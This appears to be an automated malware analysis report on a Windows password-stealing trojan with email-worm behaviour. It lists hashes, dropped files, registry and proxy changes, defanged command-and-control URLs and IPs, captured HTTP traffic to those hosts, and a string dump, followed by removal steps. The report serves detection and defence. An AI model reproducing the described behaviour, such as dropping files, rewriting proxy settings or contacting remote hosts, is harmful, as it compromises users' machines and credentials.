Trojan.Win32.Gofot.frc (Kaspersky), Gen:Variant.Graftor.112914 (B) (Emsisoft), Gen:Variant.Graftor.112914 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: e48aab3ebe9c90ab28ddf9ae34572704
SHA1: 80a93f3fdcc982c28c0fb67268ed6372a793bd5a
SHA256: f6cf59e76a45535b9839fa5b2444915179fae7174e97411264f2af202e9998d8
SSDeep: 24576:djco9HBcyy9wYbqdu Uy3kmaJBgFB2b5HDubJQ5eseDX2nXUXNNVi:eIymLUy3kmambOeDCMN7i
Size: 1552384 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2016-12-01 09:40:58
Analyzed on: Windows7 SP1 32-bit
Summary: Trojan-PSW. Trojan program intended for stealing users' passwords.
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
%original file name%.exe:3380
The Trojan injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:3380 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\winhelp.ini (381 bytes)
C:\Windows\0cm7.dll (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\udp[1].htm (31 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\fs[1].htm (52 bytes)
C:\Windows\System32\ML4v.txt (31 bytes)
C:\Windows\System32\JiTG.txt (52 bytes)
C:\Windows\1kmu.exe (50 bytes)
C:\Windows\System32\6298.txt (31 bytes)
The Trojan deletes the following file(s):
C:\Windows\winhelp.ini (0 bytes)
C:\Windows\System32\JiTG.txt (0 bytes)
C:\Windows\System32\ML4v.txt (0 bytes)
C:\Windows\System32\6298.txt (0 bytes)
Registry activity
The process %original file name%.exe:3380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASMANCS]
"EnableFileTracing" = "0"
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
Dropped PE files
MD5 | File path |
---|---|
a82965d35bcabacf7a2cae338b2c62a6 | c:\Windows\0cm7.dll |
7a7ac06a379148ff23ca3e9c3b90b07b | c:\Windows\1kmu.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:3380
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Windows\winhelp.ini (381 bytes)
C:\Windows\0cm7.dll (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\udp[1].htm (31 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\fs[1].htm (52 bytes)
C:\Windows\System32\ML4v.txt (31 bytes)
C:\Windows\System32\JiTG.txt (52 bytes)
C:\Windows\1kmu.exe (50 bytes)
C:\Windows\System32\6298.txt (31 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 55490 | 57344 | 4.45163 | 0e44623b93ac4c84c970bed81ecdba2e |
.rdata | 61440 | 14966 | 16384 | 3.20399 | cb8c4aafd8e935c7c54fe5ada7e940ea |
.data | 77824 | 1482208 | 1474560 | 4.34935 | 40d7545c8f51594c27bdbdf1f7851de0 |
Network Activity
URLs
URL | IP |
---|---|
hxxp://ipaddress.wb916.com/udp.htm | 120.55.106.30 |
hxxp://ipaddress.wb916.com/fs.aspx | 120.55.106.30 |
dns.msftncsi.com | 131.107.255.255 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /udp.htm HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: ipaddress.wb916.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 31
Content-Type: text/html
Last-Modified: Fri, 25 Nov 2016 18:01:38 GMT
Accept-Ranges: bytes
ETag: "d639eaf74547d21:1324"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 08 Dec 2016 17:01:46 GMT
[120.55.106.30|120.55.106.30]......
GET /fs.aspx HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: ipaddress.wb916.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 08 Dec 2016 17:01:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30128
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52
......IP...:..[194.242.96.218]........:(.........)
Strings from Dumps
%original file name%.exe_3380:
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
c:\windows\winhelp.ini
c:\windows\winhelp.ini
121.43.144.6
121.43.144.6
120.26.218.133
120.26.218.133
/udp.htm
/udp.htm
121.43.144.6|120.26.218.133
121.43.144.6|120.26.218.133
timwp.exe
timwp.exe
Timwp.dll
Timwp.dll
Timwp.dll"
Timwp.dll"
AppCom.dll
AppCom.dll
AppCom.dll"
AppCom.dll"
CPHelper.dll
CPHelper.dll
CPHelper.dll"
CPHelper.dll"
KernelUtil.dll
KernelUtil.dll
KernelUtil.dll"
KernelUtil.dll"
&fromSubId=1&subcmd=all&uin=
&fromSubId=1&subcmd=all&uin=
timwp.exe tencent://AddContact/?fromId=
timwp.exe tencent://AddContact/?fromId=
timwp.exe
timwp.exe
Common.dll
Common.dll
@`AMainFrame.dll
@`AMainFrame.dll
wAhXXp://list.uc916.com:7000/server/imin/list.txt?
wAhXXp://list.uc916.com:7000/server/imin/list.txt?
5B3838F5-0C81-46D9-A4C0-6EA28CA3E942
5B3838F5-0C81-46D9-A4C0-6EA28CA3E942
urlmon
urlmon
gdi32.dll
gdi32.dll
URLDownloadToFileA
URLDownloadToFileA
=#>->5>=>
=#>->5>=>
;
;
1%1-161?1
1%1-161?1
3 3$3(3,30343@3
3 3$3(3,30343@3
c:\%original file name%.exe
c:\%original file name%.exe
(*.*)
(*.*)
1kmu.exe_3700: